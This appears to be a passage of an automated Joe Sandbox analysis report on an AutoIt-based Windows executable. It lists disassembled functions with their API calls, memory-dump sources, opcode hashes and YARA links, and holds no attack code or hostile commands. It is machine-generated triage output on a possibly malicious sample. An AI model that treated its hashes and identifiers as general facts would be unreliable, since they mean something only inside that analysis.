                                                                                                                                                                    • Part of subcall function 001FB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001FB85B), ref: 001FB926
                                                                                                                                                                    • Part of subcall function 001FB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,001FB85B,00000000,?,?,001FAF1E,?,?), ref: 001FB9BD
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,001FAF1E,?,?), ref: 001FB864
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2797419724-0
                                                                                                                                                                  • Opcode ID: fe7548c5b3f28e083d72eb1157252f690b8c523f4d2d4ee581b018bb5cc8ce59
                                                                                                                                                                  • Instruction ID: 2738762cddd7c915b02e39b134d2ce70e90b31bbb1ceba4eafdb664d14486361
                                                                                                                                                                  • Opcode Fuzzy Hash: fe7548c5b3f28e083d72eb1157252f690b8c523f4d2d4ee581b018bb5cc8ce59
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CD012B528430C77DB102B61DC0BF5D3E1EAB51790F908421F705691E18BB568209555
                                                                                                                                                                  Function 00208E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00208E1F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: b0ebb107affe37fb24512d106e132bdaad53b73d034ee591982065be57788447
                                                                                                                                                                  • Instruction ID: 9e888ac09a23f7335d78e35e9738743be4ee503f33115ba5cb3259dd81f9bbe0
                                                                                                                                                                  • Opcode Fuzzy Hash: b0ebb107affe37fb24512d106e132bdaad53b73d034ee591982065be57788447
                                                                                                                                                                  • Instruction Fuzzy Hash: F9A0123000050CA78A001B51FC084447F5CD6041507008050F40C00121877354204985
                                                                                                                                                                  Function 0020A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00206AE9,002967D8,00000014), ref: 0020A937
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 9fd3fc888256f31d8e2a208100cfdbbb755e94357bf08996ec5b7acd1390e795
                                                                                                                                                                  • Instruction ID: d6127ef7e1551add6701aae70b7a94b4d45ef3c1d7990031ec21f6ab875fdb77
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fd3fc888256f31d8e2a208100cfdbbb755e94357bf08996ec5b7acd1390e795
                                                                                                                                                                  • Instruction Fuzzy Hash: BEB012B47031034BDB084B38BC9C11B39D4574B30131180BDB007C3560DF708410DF00
                                                                                                                                                                  Function 00200EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                  • Instruction ID: ead455f3b2a8b5f0565c10d50820d96decee7b78516f0fc71bcaaf69322be4bd
                                                                                                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                  • Instruction Fuzzy Hash: C5C1F8722293934AEF2D4A39C47453EFAA15EA27B171A035DD8F3CB8C2EE24C574D650
                                                                                                                                                                  Function 002012F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                  • Instruction ID: 8495f634e3c65ac8f98954b87f032a4acb33cfe1aef69719a32c8261d1e20c87
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                  • Instruction Fuzzy Hash: 85C11B722293934AEF2D4A39C47053EFAA15EA27B131A035DD4B3CF8D6EE24C534D650
                                                                                                                                                                  Function 00200A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                  • Instruction ID: 97fcddd07d48f372843247ab57288730e7295fa6efccf3d7f00bc22358359960
                                                                                                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                  • Instruction Fuzzy Hash: E5C1E67232939349FF2D4A39C4B463EFAA05AA27B571A076DD4B3CB4C2EE14C534D660
                                                                                                                                                                  Function 00200677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                  • Instruction ID: 83cddd9125110bcf49e29c4c62a69d4018b95a30fe8d5bdafbb7d31fceb2cbcd
                                                                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                  • Instruction Fuzzy Hash: 52C1E67222939349FF2D4A3984B463EFBA15EA27B171A036DD4B3CB4C2EE24D534C650
                                                                                                                                                                  Function 0023A750 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 490commemoryfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0023A7A5
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0023A7B7
                                                                                                                                                                  • DestroyWindow.USER32 ref: 0023A7C5
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0023A7DF
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0023A7E6
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0023A927
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0023A937
                                                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023A97F
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0023A98B
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0023A9C5
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023A9FA
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AA05
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0023AA0E
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AA1D
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0023AA26
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AA2D
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0023AA38
                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0023AA4A
                                                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0026D9BC,00000000), ref: 0023AA60
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0023AA70
                                                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0023AA96
                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0023AAB5
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AAD7
                                                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023ACC4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Global$Rect$Create$DeleteFileFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                  • API String ID: 2148010464-2373415609
                                                                                                                                                                  • Opcode ID: 3c74e939120070ea63d0707986090f39191d6dff7f26d64a06dd6ecc0d78f8ef
                                                                                                                                                                  • Instruction ID: 290e968236490ec1b8629d6f4ca9e13b19876874e51e0ecb4c31ab6eca4b6641
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c74e939120070ea63d0707986090f39191d6dff7f26d64a06dd6ecc0d78f8ef
                                                                                                                                                                  • Instruction Fuzzy Hash: ED028F71A10209EFDB14DFA5DC89EAEBBB9FF49310F008159F905AB2A0DB709D51CB60
                                                                                                                                                                  Function 0024D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0024D0EB
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0024D11C
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0024D128
                                                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0024D142
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0024D151
                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0024D17C
                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 0024D184
                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0024D18B
                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 0024D19A
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0024D1A1
                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0024D1EC
                                                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 0024D21E
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024D249
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColor.USER32(00000012), ref: 0024D3BE
                                                                                                                                                                    • Part of subcall function 0024D385: SetTextColor.GDI32(?,?), ref: 0024D3C2
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColorBrush.USER32(0000000F), ref: 0024D3D8
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColor.USER32(0000000F), ref: 0024D3E3
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColor.USER32(00000011), ref: 0024D400
                                                                                                                                                                    • Part of subcall function 0024D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0024D40E
                                                                                                                                                                    • Part of subcall function 0024D385: SelectObject.GDI32(?,00000000), ref: 0024D41F
                                                                                                                                                                    • Part of subcall function 0024D385: SetBkColor.GDI32(?,00000000), ref: 0024D428
                                                                                                                                                                    • Part of subcall function 0024D385: SelectObject.GDI32(?,?), ref: 0024D435
                                                                                                                                                                    • Part of subcall function 0024D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0024D454
                                                                                                                                                                    • Part of subcall function 0024D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0024D46B
                                                                                                                                                                    • Part of subcall function 0024D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0024D480
                                                                                                                                                                    • Part of subcall function 0024D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0024D4A8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                                                  • Opcode ID: 41bb5bb19017ef36ba11bee2b05b30c14fe339e58c385e4fbb7c0c7118f25381
                                                                                                                                                                  • Instruction ID: 7cb03ffe747e8c768b8ea9372ad4f4ba3c9a4cc6dbc807b969a9a2037c889438
                                                                                                                                                                  • Opcode Fuzzy Hash: 41bb5bb19017ef36ba11bee2b05b30c14fe339e58c385e4fbb7c0c7118f25381
                                                                                                                                                                  • Instruction Fuzzy Hash: 8291AE72908305AFDB10DF64EC0CE5BBBA9FF89320F504A19F966961E0D7B1D944CB52
                                                                                                                                                                  Function 0023A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0023A42A
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0023A4E9
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0023A527
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0023A539
                                                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0023A57F
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0023A58B
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0023A5CF
                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0023A5DE
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 0023A5EE
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0023A5F2
                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0023A602
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0023A60B
                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0023A614
                                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0023A642
                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 0023A659
                                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0023A694
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0023A6A8
                                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 0023A6B9
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0023A6E9
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 0023A6F4
                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0023A6FF
                                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0023A709
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                                  • Opcode ID: 5cb55d9b62e76a0f075ccfb69d3e7a731954df20da471cff1b489a7cf0cd75ab
                                                                                                                                                                  • Instruction ID: e8bcb67bf1a08e4de0affb7951cc9d4c08bc4a13ad3e2f33ca4070d7130f3541
                                                                                                                                                                  • Opcode Fuzzy Hash: 5cb55d9b62e76a0f075ccfb69d3e7a731954df20da471cff1b489a7cf0cd75ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 98A173B1A10619BFEB14DFA5EC49FAE7BB9EB05710F008114FA15A71E0DBB4AD11CB60
                                                                                                                                                                  Function 0022E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022E45E
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,0027DC88,?,\\.\,0027DBF0), ref: 0022E54B
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,0027DC88,?,\\.\,0027DBF0), ref: 0022E6B1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
